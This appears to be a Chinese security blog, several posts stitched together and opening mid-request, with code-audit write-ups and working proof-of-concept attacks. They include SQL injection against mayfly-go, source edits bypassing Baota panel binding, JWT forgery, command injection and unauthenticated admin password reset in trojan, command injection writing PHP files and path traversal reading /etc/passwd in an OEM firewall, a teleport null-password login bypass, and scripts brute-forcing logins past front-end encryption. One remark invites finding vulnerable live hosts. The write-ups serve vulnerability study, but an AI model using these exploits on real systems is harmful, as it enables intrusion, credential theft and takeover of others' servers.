User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjUwODAxMjcsImlkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.qf3LuOfc7-kZYYQVXZ6TSx3CGZLXKhoN_2kG1PUGhyI
Referer: http://10.211.55.3:8888/
Accept-Encoding: gzip

GET /api/dbs/13/c-metadata?db=mayfly-go&id=13&tableName=t_sys_role_resource%27and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27 HTTP/1.1
Host: 10.211.55.3:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjUwODAxMjcsImlkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.qf3LuOfc7-kZYYQVXZ6TSx3CGZLXKhoN_2kG1PUGhyI
Referer: http://10.211.55.3:8888/
Accept-Encoding: gzip

看下2处的代码

func (d *Db) TableIndex(rc *ctx.ReqCtx) {
	tn := rc.GinCtx.Query("tableName")
	biz.NotEmpty(tn, "tableName不能为空")
	rc.ResData = d.DbApp.GetDbInstance(GetIdAndDb(rc.GinCtx)).GetMeta().GetTableIndex(tn)
}

// @router /api/db/:dbId/c-metadata [get]
func (d *Db) ColumnMA(rc *ctx.ReqCtx) {
	g := rc.GinCtx
	tn := g.Query("tableName")
	biz.NotEmpty(tn, "tableName不能为空")

	dbi := d.DbApp.GetDbInstance(GetIdAndDb(rc.GinCtx))
	biz.ErrIsNilAppendErr(d.ProjectApp.CanAccess(rc.LoginAccount.Id, dbi.ProjectId), "%s")
	rc.ResData = dbi.GetMeta().GetColumns(tn)
}

都是只校验不为空，无其他过滤

不过这个后台功能点本身就是对添加的数据源进行sql查询，这个注入点也是影响数据源而不是平台本身，也没啥危害。

宝塔 7.9.47 绕过手机号绑定

Mon, 03 Oct 2022 12:00:00 +0800

最近看到Tide安全团队的文章，介绍了宝塔的新旧版绑定相关功能点，尝试对新版的手机号绑定进行绕过

https://mp.weixin.qq.com/s/Ty7iOxfep2M2PXWqtwzm1w

绕过手机号绑定

麻烦且粗暴的方法

经过一番摸索，可以不用绑定，但后台几处功能点无法正常使用,比较蛋疼

用户协议确认

1
2
3

/www/server/panel/data/licenes.pl

True

建一个假的userInfo.json

/www/server/panel/data/userInfo.json

{
    "uid": 111111,
    "address": "127.0.0.1",
    "access_key": "",
    "secret_key": "",
    "addtime": 1664633884,
    "username": "11111111111",
    "idc_code": "",
    "state": 1,
    "serverid": "1111111111111111111111111111111111111111111111111111111111111111",
    "ukey": ""
  }

1
2
3

/www/server/panel/data/sid.pl

111

修改 softList 的值

/www/server/panel/class/panelPlugin.py

990-994行
把以下5行
if not 'list' in softList:
            if 'msg' in softList:
                raise public.PanelError(softList['msg'])
            else:
                raise public.PanelError('获取插件列表失败!')

改为
softList={"list":[]}

删除get_pd

/www/server/panel/BTPanel/__init__.py

855行
defs = ('get_lines', 'php_info', 'change_phpmyadmin_ssl_port', 'set_phpmyadmin_ssl', 'get_phpmyadmin_ssl','get_pd','get_pay_type',
            'check_user_auth', 'to_not_beta', 'get_beta_logs', 'apple_beta', 'GetApacheStatus', 'GetCloudHtml',
            'get_load_average', 'GetOpeLogs', 'GetFpmLogs', 'GetFpmSlowLogs', 'SetMemcachedCache', 'GetMemcachedStatus',
            'GetRedisStatus', 'GetWarning', 'SetWarning', 'CheckLogin', 'GetSpeed', 'GetAd', 'phpSort', 'ToPunycode',
            'GetBetaStatus', 'SetBeta', 'setPHPMyAdmin', 'delClose', 'KillProcess', 'GetPHPInfo', 'GetQiniuFileList','get_process_tops','get_process_cpu_high',
            'UninstallLib', 'InstallLib', 'SetQiniuAS', 'GetQiniuAS', 'GetLibList', 'GetProcessList', 'GetNetWorkList',
            'GetNginxStatus', 'GetPHPStatus', 'GetTaskCount', 'GetSoftList', 'GetNetWorkIo', 'GetDiskIo', 'GetCpuIo','ignore_version',
            'CheckInstalled', 'UpdatePanel', 'GetInstalled', 'GetPHPConfig', 'SetPHPConfig','log_analysis','speed_log','get_result','get_detailed')

改为
defs = ('get_lines', 'php_info', 'change_phpmyadmin_ssl_port', 'set_phpmyadmin_ssl', 'get_phpmyadmin_ssl','get_pay_type',
            'check_user_auth', 'to_not_beta', 'get_beta_logs', 'apple_beta', 'GetApacheStatus', 'GetCloudHtml',
            'get_load_average', 'GetOpeLogs', 'GetFpmLogs', 'GetFpmSlowLogs', 'SetMemcachedCache', 'GetMemcachedStatus',
            'GetRedisStatus', 'GetWarning', 'SetWarning', 'CheckLogin', 'GetSpeed', 'GetAd', 'phpSort', 'ToPunycode',
            'GetBetaStatus', 'SetBeta', 'setPHPMyAdmin', 'delClose', 'KillProcess', 'GetPHPInfo', 'GetQiniuFileList','get_process_tops','get_process_cpu_high',
            'UninstallLib', 'InstallLib', 'SetQiniuAS', 'GetQiniuAS', 'GetLibList', 'GetProcessList', 'GetNetWorkList',
            'GetNginxStatus', 'GetPHPStatus', 'GetTaskCount', 'GetSoftList', 'GetNetWorkIo', 'GetDiskIo', 'GetCpuIo','ignore_version',
            'CheckInstalled', 'UpdatePanel', 'GetInstalled', 'GetPHPConfig', 'SetPHPConfig','log_analysis','speed_log','get_result','get_detailed')

修改check_user_auth函数的返回

/www/server/panel/class/ajax.py

把1300行左右的
				try:
            userInfo = json.loads(public.ReadFile(u_path))
        except:
            if os.path.exists(u_path): os.remove(u_path)
            return public.returnMsg(False,'宝塔帐户绑定已失效，请在[设置]页面重新绑定!')

改为
				try:
            userInfo = json.loads(public.ReadFile(u_path))
        except:
            userInfo = json.loads(public.ReadFile(u_path))

把1300行左右的
if result == '0':
            if os.path.exists(u_path): os.remove(u_path)
            return public.returnMsg(False,'宝塔帐户绑定已失效，请在[设置]页面重新绑定!')

改为
if result == '0':
            session[m_key] = public.returnMsg(True,'绑定有效!')
            return session[m_key]

修改 is_verify_unbinding 函数的判断

/www/server/panel/class/panelPlugin.py

把 3050行左右的
							if not list_body['status']:
                if os.path.exists(path):os.remove(path)
                return False
这3行删掉

命令 bt 然后 1 重启服务即可，后台docker(专业版)和防火墙(专业版)和软件商店无法正常使用,其余正常

trojan多用户管理部署程序审计学习

Fri, 30 Sep 2022 12:00:00 +0800

最近看到大佬提的issue，正好学习下

https://github.com/Jrohy/trojan

指纹特征

/auth/check 路径会返回title值,可以用作指纹特征
{"code":200,"data":{"title":"AAA"},"message":"success"}

fofa 语句 body='href="./static/index.ab2a3fed.css">'

环境搭建

我这里图方便用docker搭建了

1
2
3

docker run --name trojan-mariadb --restart=always -p 3306:3306 -v /home/mariadb:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=trojan -e MYSQL_ROOT_HOST=% -e MYSQL_DATABASE=trojan -d mariadb:10.2

docker run -it -d --name trojan --net=host --restart=always --privileged jrohy/trojan init

拉起后进入容器,这里得提前配置下域名解析,这个需要通过域名访问

docker exec -it trojan bash

trojan
请选择使用证书方式: 1
请输入申请证书的域名: xxx.xxx.com

配置数据库,密码默认就是上面的 trojan

没啥问题,输入域名就能访问了

硬编码jwt密钥

在 web/auth.go 文件中

func jwtInit(timeout int) {
	authMiddleware, err = jwt.New(&jwt.GinJWTMiddleware{
		Realm:       "k8s-manager",
		Key:         []byte("secret key"),
		Timeout:     time.Minute * time.Duration(timeout),
		MaxRefresh:  time.Minute * time.Duration(timeout),
		IdentityKey: identityKey,
		SendCookie:  true,
		PayloadFunc: func(data interface{}) jwt.MapClaims {
			if v, ok := data.(*Login); ok {
				return jwt.MapClaims{
					identityKey: v.Username,
				}
			}
			return jwt.MapClaims{}
		}
	......
	})
}

可以看到硬编码的 jwt 密钥 secret key

有jwt密钥我们就可以伪造任意用户的token,默认管理员用户是admin

先解码看下格式

测试生成admin的token

1
2

import jwt
jwt.encode({'exp':1664179347,'id':'admin','orig_iat':1664172147},algorithm='HS256',key='secret key')

通过这个token访问 /trojan/user 接口可以得到除admin外所有用户账号密码,以及服务的对应域名

命令注入漏洞

在 util/linux.go 文件的LogChan函数中,存在命令执行函数exec

func LogChan(serviceName, param string, closeChan chan byte) (chan string, error) {
	cmd := exec.Command("bash", "-c", fmt.Sprintf("journalctl -f -u %s -o cat %s", serviceName, param))

	stdout, _ := cmd.StdoutPipe()

	if err := cmd.Start(); err != nil {
		fmt.Println("Error:The command is err: ", err.Error())
		return nil, err
	}
	ch := make(chan string, 100)
	stdoutScan := bufio.NewScanner(stdout)
	go func() {
		for stdoutScan.Scan() {
			select {
			case <-closeChan:
				stdout.Close()
				return
			default:
				ch <- stdoutScan.Text()
			}
		}
	}()
	return ch, nil
}

查看调用

web/web.go

func trojanRouter(router *gin.Engine) {
	router.POST("/trojan/start", func(c *gin.Context) {
		c.JSON(200, controller.Start())
	})
	router.POST("/trojan/stop", func(c *gin.Context) {
		c.JSON(200, controller.Stop())
	})
	router.POST("/trojan/restart", func(c *gin.Context) {
		c.JSON(200, controller.Restart())
	})
	router.GET("/trojan/loglevel", func(c *gin.Context) {
		c.JSON(200, controller.GetLogLevel())
	})
	router.GET("/trojan/export", func(c *gin.Context) {
		result := controller.ExportCsv(c)
		if result != nil {
			c.JSON(200, result)
		}
	})
	router.POST("/trojan/import", func(c *gin.Context) {
		c.JSON(200, controller.ImportCsv(c))
	})
	router.POST("/trojan/update", func(c *gin.Context) {
		c.JSON(200, controller.Update())
	})
	router.POST("/trojan/switch", func(c *gin.Context) {
		tType := c.DefaultPostForm("type", "trojan")
		c.JSON(200, controller.SetTrojanType(tType))
	})
	router.POST("/trojan/loglevel", func(c *gin.Context) {
		slevel := c.DefaultPostForm("level", "1")
		level, _ := strconv.Atoi(slevel)
		c.JSON(200, controller.SetLogLevel(level))
	})
	router.POST("/trojan/domain", func(c *gin.Context) {
		c.JSON(200, controller.SetDomain(c.PostForm("domain")))
	})
	router.GET("/trojan/log", func(c *gin.Context) {
		controller.Log(c)
	})
}

其中/trojan/log路径调用controller.Log(c),传递参数c

跟进 Log方法，到 web/controller/trojan.go

// Log 通过ws查看trojan实时日志
func Log(c *gin.Context) {
	var (
		wsConn *websocket.WsConnection
		err    error
	)
	if wsConn, err = websocket.InitWebsocket(c.Writer, c.Request); err != nil {
		fmt.Println(err)
		return
	}
	defer wsConn.WsClose()
	param := c.DefaultQuery("line", "300")
	if param == "-1" {
		param = "--no-tail"
	} else {
		param = "-n " + param
	}
	result, err := websocket.LogChan("trojan", param, wsConn.CloseChan)
	if err != nil {
		fmt.Println(err)
		wsConn.WsClose()
		return
	}
	for line := range result {
		if err := wsConn.WsWrite(ws.TextMessage, []byte(line+"\n")); err != nil {
			log.Println("can't send: ", line)
			break
		}
	}
}

可以看到param无过滤，直接被传给了LogChan

poc

GET /trojan/log?line=300`touch%20/tmp/success`&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjQxNzkzNDcsImlkIjoiYWRtaW4iLCJvcmlnX2lhdCI6MTY2NDE3MjE0N30.iuFiunMc5kx8q4_2CZzAnGQPLjpSK0BW_1X6_bRdP04 HTTP/1.1
Host: xxx.xxx.com
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Upgrade: websocket
Origin: http://xxx.xxx.com
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjQxNzkzNDcsImlkIjoiYWRtaW4iLCJvcmlnX2lhdCI6MTY2NDE3MjE0N30.iuFiunMc5kx8q4_2CZzAnGQPLjpSK0BW_1X6_bRdP04
Sec-WebSocket-Key: NUAPtgysa4gd5VMU6znU1g==

前台管理员密码重置

在 web/auth.go Auth 方法

func updateUser(c *gin.Context) {
	responseBody := controller.ResponseBody{Msg: "success"}
	defer controller.TimeCost(time.Now(), &responseBody)
	username := c.DefaultPostForm("username", "admin")
	pass := c.PostForm("password")
	err := core.SetValue(fmt.Sprintf("%s_pass", username), pass)
	if err != nil {
		responseBody.Msg = err.Error()
	}
	c.JSON(200, responseBody)
}

// Auth 权限router
func Auth(r *gin.Engine, timeout int) *jwt.GinJWTMiddleware {
	......	
	r.POST("/auth/register", updateUser)
	......
}

没有对注册方法做验证，这个是用于第一次打开应用时修改admin密码的，现在重复调用改接口可直接修改admin密码

poc

POST http://xxx.xxx.com/auth/register HTTP/1.1
Host: xxx.xxx.com
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymc8kPkyHhSLWSsTf
Connection: close

------WebKitFormBoundarymc8kPkyHhSLWSsTf
Content-Disposition: form-data; name="password"

f8cdb04495ded47615258f9dc6a3f4707fd2405434fefc3cbf4ef4e6
------WebKitFormBoundarymc8kPkyHhSLWSsTf--

直接 admin/123456 就可以登录了

fofa找找,大量的免费机场🥰

绕前端加密

抓下登录包

POST http://xxx.xxx.com/auth/login HTTP/1.1
Host: xxx.xxx.com
Content-Length: 90
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9Connection: close

{"username":"admin","password":"e25388fde8290dc286a6164fa2d97e551b53498dcbf7bc378eb1f178"}

password字段被加密了,去前端找下

不出意外，控制台可调

`1`	`CryptoJS.SHA224("1").toString();`

Source & Reference

某oem产品审计学习

Fri, 30 Sep 2022 12:00:00 +0800

比较老的洞了,最近看到有人交了rce,正好学习下,应该是多家oem的产品

命令执行1

先看 poc

/webui/?g=aaa_portal_auth_local_submit&suffix=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111112.php&bkg_flag=0

全局搜索 aaa_portal_auth_local_submit 看下是哪里的问题

定位到 webui/modules/aaa/portal_auth.mds

//----------------------------------------------------------------------------------本地认证-----------------------------------
if($get_url_param == "aaa_portal_auth_local_submit"){
	
	$suffix = $_GET['suffix'];
	$config = file_get_contents($portal_catalog."/config.txt");
	$config_arr = json_decode($config,true);

	$tab_name = $_GET['tab_name'];
	$welcome_word = $_GET['welcome_word'];
	$btn_color = $_GET['btn_color'];

	//基本配置
	$baseFlag = $_GET['baseFlag'];
	if(gettype($baseFlag) != 'undefined' && $baseFlag == 1){

		$config_arr = save_config('local',$config_arr,$tab_name,$welcome_word,$btn_color,'','');

		$new_config = json_encode($config_arr);
		file_put_contents($portal_catalog."/config.txt",$new_config);
		//file_put_contents("/mnt/copyconfig.txt", $new_config);//添加一个备份文件，然后将备份文件copy到系统内的文件即可
		backupAuthFile('local');
		echo '{"success":"local_base"}';
		return;
		
	}
	//logo
	if($_GET['bkg_flag'] == 0){
		
		if($_FILES['local_logo_file']['error'] == UPLOAD_ERR_OK){

			$tmp_name = $portal_catalog.'/local/images/localLogo_tmp'.$suffix;
			$final_name = $portal_catalog.'/local/images/localLogo'.$suffix;
			$type = 'local_logo_file';

			if(!checkFileSize($type,$tmp_name,$final_name,$uploadFileSize)){
				return;
			}
		}

		$config_arr = save_config('local',$config_arr,$tab_name,$welcome_word,$btn_color,'','');

		$config_arr[local][local_logo_pic] = $_FILES['local_logo_file']['name'];

		$new_config = json_encode($config_arr);
		file_put_contents($portal_catalog."/config.txt",$new_config);
		//file_put_contents("/mnt/copyconfig.txt", $new_config);//添加一个备份文件，然后将备份文件copy到系统内的文件即可
		backupAuthFile('local');
		echo '{"success":"local_logo"}';
		return;
		
	}else{ //bkg

		//如果tab_name不为空,表示此时需同步修改tab_name等内容
		if($tab_name){
			$config_arr = save_config('local',$config_arr,$tab_name,$welcome_word,$btn_color,'','');
		}
		if($_FILES['local_bkg_file']['error'] == UPLOAD_ERR_OK){
			$tmp_name = $portal_catalog.'/local/images/localBkg_tmp'.$suffix;
			$final_name = $portal_catalog.'/local/images/localBkg'.$suffix;
			$type = 'local_bkg_file';
			
		if(!checkFileSize($type,$tmp_name,$final_name,$uploadFileSize)){
				return;
			}
		}
		$config_arr[local][local_bkg_pic] = $_FILES['local_bkg_file']['name'];
		$new_config = json_encode($config_arr);
		file_put_contents($portal_catalog."/config.txt",$new_config);
		//file_put_contents("/mnt/copyconfig.txt", $new_config);//添加一个备份文件，然后将备份文件copy到系统内的文件即可
		backupAuthFile('local');
		echo '{"success":"local_bkg"}';
		return;
	}
}

看下 suffix 参数被传入到了哪里,为什么会触发命令执行

suffix 先后被赋值给了 tmp_name,final_name, 然后这2个参数被传给了 checkFileSize 函数

看下 checkFileSize 函数

function checkFileSize($type,$tmp_name,$final_name,$uploadFileSize){
	move_uploaded_file($_FILES[$type]['tmp_name'],$tmp_name);

	if(filesize($tmp_name) - $uploadFileSize > 0){
		exec('rm '.$tmp_name);
		echo '{"warning":"图片大小超过限制","type":"'.$type.'"}';
		return false;
	}else{
		exec('mv '.$tmp_name.' '.$final_name);
		return true;
	}
}

很好,看来是危险函数exec执行了我们的命令

这里poc的suffix值是

换行符
echo 'test2' >> /tmp/success2

%0Aecho%20%27test2%27%20%3E%3E%20%2Ftmp%2Fsuccess2

我试了下,用这个也行

1
2
3

/tmp/ttt || echo 'test3' >> /tmp/success3

%2Ftmp%2Fttt%20%7C%7C%20echo%20%27test3%27%20%3E%3E%20%2Ftmp%2Fsuccess3

不过可以看到是有换行符的效果更好

命令执行2

先看poc

/webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111111.php%0a

全局搜索 aaa_portal_auth_local_submit

if($get_url_param == "aaa_portal_auth_config_reset"){
	$type = $_GET['type'];
	$logo_type = $type.'_logo_pic';
	$bkg_type = $type.'_bkg_pic';

	$config = file_get_contents($portal_catalog."/config.txt");
	$config_arr = json_decode($config,true);

	$config_dft = file_get_contents($portal_catalog."/default_config.txt");
	$config_dft_arr = json_decode($config_dft,true);
	
	if($type == 'adv'){
		$config_arr[diff] = $config_dft_arr[diff];
	}
	$config_arr[$type] = $config_dft_arr[$type];

	//删除图片
	exec('rm '.$portal_catalog.'/'.$type.'/images/'.$type.'*');

	$new_config = json_encode($config_arr);
	file_put_contents($portal_catalog."/config.txt",$new_config);
	backupAuthFile($type);
	echo '{"reset":"'.$type.'"}';
}

明晃晃的 exec ,有点过分的

任意文件读取

先看poc

requests:
  - method: GET
    path:
      - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd"
      - "{{BaseURL}}/webui/?g=sys_dia_data_check&file_name=../../../../../../../../etc/passwd"
      - "{{BaseURL}}/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd"
      - "{{BaseURL}}/webui/?g=sys_corefile_sysinfo_download&name=../../../../../../../../etc/passwd"

先全局搜下 sys_dia_data_down

if( $get_url_param == 'sys_dia_data_down'){
	// if($_POST['file_name']!=null) $param['file_name'] = formatpost($_POST['file_name']);

	$fname = "/mnt/".$_GET['file_name'];	
	$data = file_get_contents($fname);
	Header("Pragma: public");
	Header("Cache-Control: private");
	Header("Content-type: text/plain");
	Header("Accept-Ranges: bytes");
	Header("Content-Length: " . strlen($data));
	Header("Content-Disposition: attachment; filename=".$_GET['file_name'] );
	ob_clean();
	echo $data;
	exit();

}

可以看到 file_name 参数没有被过滤直接被 file_get_contents 函数所读取了,导致的任意文件读取

不过 file_get_contents 函数可以造成ssrf,这里由于前面拼接了 /mnt/ ,所以不好进行ssrf

绕过验证码爆破

先看poc

`1`	`/remote_auth.php?user=admin&pwd=admin&sign=ba84d9dd91eb304aca57f0a8f052623e`

这个sign从哪来,其实就硬编码在 /usr/local/webui/remote_auth.php 中

if($_GET['user']!=null) $usr = formatget($_GET['user']);
if($_GET['pwd']!=null) $pwd = formatget($_GET['pwd']);
if($_GET['sign']!=null) $sign = formatget($_GET['sign']);
$key= 'saplingos!@#$%^&*';//这个key你们协商后保存一致即可
//ba84d9dd91eb304aca57f0a8f052623e
if(empty($usr)){
	die('user_null');
}
else if(empty($pwd)){
	die('pwd_null');
}
else if (!$sign){
	die('sign_null');
}
else if ($sign != md5($key)){
	die('sign_error');
}
else{
	if (isset($usr, $pwd)) {
		LoginHandler::login($usr, $pwd, $num,'',$remote_auth = true);
	}
	$fail_msg = '';
	if (LoginHandler::isLoginFail()) {
		$fail_msg = $_SESSION[ERROR_STR];
		if (strlen($fail_msg) <= 0) {
			$fail_msg = LocalUtil::getCommonResource('login_failed');
		}
		die($fail_msg);
	}
}

我们可以通过任意文件读取漏洞读取key,然后进行爆破

前端攻防案例续集

Mon, 19 Sep 2022 01:00:00 +0800

参考 kitezzzGrim 分享的案例做个总结

一个 DES 案例

登录点就不放图了，先抓个包看看

可以看到目标站点对username和password都进行了加密

f12 看看 js

挺好，直接表示了是 des 加密，还用的 des.js

那么其实现在在控制台就可以调用加密函数了

`1`	`DES.Encrypt("admin")`

当然，我们可以看下 des.js 文件，找下key

做了混淆，搜了下，是类似 eval(function(p,a,c,k,e,r){}) 的加密，有在线还原的站点

https://wangye.org/tools/scripts/eval/

得到 key

一个 AES 案例

登录点不放图

随便输个账户密码，抓包看看

f12 看下

从以上代码可以看出userLogin()函数中调用encrypt()函数对用户名和进行了加密

挺好，控制台可调

`1`	`encrypt('admin')`

接下来查看encrypt()函数

可以看出使用了AES加密，ECB模式，填充模式pkcs7padding，密钥key=1234567887654321

BurpCrypto 插件

上面那2个案例可以配合这个插件进行爆破

https://github.com/whwlsfb/BurpCrypto

一个 RSA 案例

登录点不放图

随便输个账户密码，抓包看看

长的一比，很大可能是rsa加密

f12 看下

可以看到publickey和encodeRSA关键字，目标站点对用户和密码都进行了rsa加密，但我们可以利用公钥加密字典来进行爆破

此时，控制台可调

1
2

var publicKey = 'xxxxx';
encodeRSA('admin', publicKey)

总结

前端加密用JSEncrypt库的很多，为了节省时间，可以直接试试搜一些jsencrypt相关的方法名，如setPublicKey、encrypt等,定位加密函数

teleport堡垒机审计学习

Fri, 16 Sep 2022 12:00:00 +0800

代码审计做的比较少，看到大佬发的分析文章，正好学习下

https://www.o2oxy.cn/4132.html

访问下载页面 https://tp4a.com/download

更新公告里说明了几个漏洞情况

下载补丁包和原版包，进行对比

任意用户登录

补丁里对几种登录类型进行了验证，不允许 password 值为 null

可以看下验证登录的函数 login,在 data/www/teleport/webroot/app/model/user.py

在 password 为null 的时候就跳过了验证

poc

抓包，把密码改为 null 即可
      {
          "type":2,
          "username":"admin",
          "password":null,
          "captcha":"rhcl",
          "oath":"",
          "remember":false
      }

顺便可以看下在 tp-const.js 里的几种登录类型的定义

这里 type 为 2 就是 TP_LOGIN_AUTH_USERNAME_PASSWORD_CAPTCHA 也就是用户名+密码+验证码类型

后台文件下载

修复补丁给 DoGetFileHandler 函数加上了一个限制，仅允许读取

找下路由

验证了权限，所以是后台洞

poc

`1`	`/audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0`

前台日志下载

这时我发现升级描述里还有一句 修正：经过特别构造的请求，无需登录即可读取TP系统操作日志； ,这个洞应该也是未授权的.

下载 teleport-server-linux-x64-3.6.4-b3.tar.gz 和 3.6.3 对比下

果然，补丁给 DoGetLogsHandler 这个函数加上了权限验证,看下他的路由

poc

    POST http://xxx.xxx.xxx.xxx/system/get-logs HTTP/1.1
    Host: xxx.xxx.xxx.xxx
    Content-Length: 162
    Content-Type: application/x-www-form-urlencoded;
    Connection: close

    args=%7B%22filter%22%3A%7B%7D%2C%22order%22%3A%7B%22k%22%3A%22log_time%22%2C%22v%22%3Afalse%7D%2C%22limit%22%3A%7B%22page_index%22%3A0%2C%22per_page%22%3A25%7D%7D

绕过验证码爆破

继续看路由，发现BindOathHandler这个函数也不需要鉴权，这个路由下还存在登陆点且无需验证码

poc

`1`	`/user/bind-oath`

POST /user/verify-user HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 102
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _sid=tp_1663328293_17c56ddafdb179f0
Connection: close

args=%7B%22username%22%3A%22admin%22%2C%22password%22%3A%22123456%22%2C%22check_bind_oath%22%3Atrue%7D

不过注意,默认口令启用强密码策略，要求密码至少8位，必须包含大写字母、小写字母以及数字

强行绑定身份验证器

同样是BindOathHandler这个函数,看了下他返回user/bind-oath.mako的模版，模版里向/user/verify-user 发送认证请求，通过路由定位到函数DoVerifyUserHandler

可以看到，这里也是用 user.login 函数认证的，所以 password 直接用 null 就可以绕过了

poc

POST http://xx.xx.xx.xx/user/verify-user HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 94
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _sid=tp_1663328293_17c56ddafdb179f0
Connection: close

args=%7B%22username%22%3A%22admin%22%2C%22password%22%3Anull%2C%22check_bind_oath%22%3Atrue%7D

同样，下一个包也设为 null 即可

这洞没啥用，可以用于恶心管理员 😝

一些思考

根据这个权限验证代码的存在与否可以找前台未授权的点，那么能不能实现自动找未授权页面？
几个权限绕过本质上是 login 函数的问题，可以根据login函数调用点找漏洞触发点

前端攻防几个小案例

Tue, 06 Sep 2022 12:00:00 +0800

俗话说好记性不如烂笔头,记录一些平时测试的案例，省的下次遇到再重新摸索

info

关键信息均已打码,漏洞均已提交相关 src 修复

登陆点1

常规前端加密,f12找password加密JS代码来进行一个爆破

这里是password的关键算法代码，可以看出该key，猜测是用了des加密

寻找password多断点，然后在登录框输入密码

进入调试状态，一步步调试到加密算法这一步

不难猜出，s是加密后的结果，object(l["a"])是加密函数，e.loginform.password是输入的密码，后面就是key值。

所以我们可以编写一个js代码测试，输入的密码为jfhack

`1`	`let jiami = Object(l["a"])("jfhack", "6c81d5508f6578f7a6071e70");console.log(jiami);`

控制台调用加密函数测试

用 cyberchef 测试

可以看到加密是一致的，这里可以直接控制台用js来生成字典

let iii = 0;
let passdic = new Array();
passdic = ['123456','000000','88888']  // 这里写字典
for (iii=0;iii<passdic.length;iii++){
    let jiami = Object(l["a"])(passdic[iii], "6c81d5508f6578f7a6071e70");
    console.log(jiami);
}

登陆点2

遇到另外一个系统，密码也加密了，但密码好像加入了时间算法会一直变化。

关键代码是:

`1`	`data.password = common.encryptPassword(data.password);`

于是编写了如下JS代码

`1`	`let jiami =common.encryptPassword('123');jiami`

可以看到多次输出一样的原生密码，加密后的密码是一直在变化

后面有朋友提示思路，可以编写JS触发发包，无需写生成字典的JS代码，这个要根据目标登录部分的代码进行修改，参考代码如下：

const array1 = ['a', 'b', 'c'];

array1.forEach(element => {
    // console.log(element)
    e.loginForm.password = element
    e.$store.dispatch("user/login" , e.loginForm)
});

jsrpc 练手案例

看了 https://www.svenbeast.com/post/kn2fEdp4Q/ 的案例后，发现 jsrpc 可以很方便的满足我们js加密场景的一些需求，然后便找了一个站进行测试。

先简单抓个包看下密文

ec6a6536ca304edf844d1d248a4f08dc,去 cmd5 反查下就知道了是2次md5

这种情况一般直接在 burp 的 intruder 模块中，payload processing 进行处理即可

这里用jsrpc来练手，先f12找相关的加密函数

小技巧

全局搜索登陆点 url
全局搜索 password、encrypto 这种关键词

其实这里可以看到,目标就是直接调用的 https://github.com/emn178/js-md5 库

不管，装作看不见👀，现在目标是通过jsrpc实现，只要找到加密函数就行

在控制台，对js中的函数和值进行输出，看是否可以得到我们需要的结果

参考项目issue https://github.com/jxhczhl/JsRpc/issues/4 中的方法可以将局部函数暴露给全局使用，这样就不用卡在断点中去调用函数了(ps:举个例,我这个场景比较简单，都不需要断点)

1
2

window.test = md5
test(test('1234'));

此时控制台能正常调用加密函数了，也把目标函数改为全局函数了，接下来控制台直接复制 jsenv.js 的代码,同时本地启动 jsrpc 服务,连接通信

`1`	`var demo = new Hlclient("ws://127.0.0.1:12080/ws?group=zzz&name=hlg");`

在控制台注册js方法通过传递函数名调用

demo.regAction("testtttt", function (resolve,param) {
    console.log(param);
    var testttt123 = test(test(param));
    resolve(testttt123);
})

访问远程调用

`1`	`http://127.0.0.1:12080/go?group=zzz&name=hlg&action=testtttt&param='1234'`

后续可以参考文章 https://www.svenbeast.com/post/kn2fEdp4Q/ 中的方案，通过本地 mitm 自动替换 payload,进行爆破

能不能在控制台直接触发发包

当然可以，将目标发送请求的部分修改后在控制台执行即可

`1`	`axios.post("/******/login", {name: "admin",password: test(test('1234'))})`

Postgresql 渗透(总结篇)

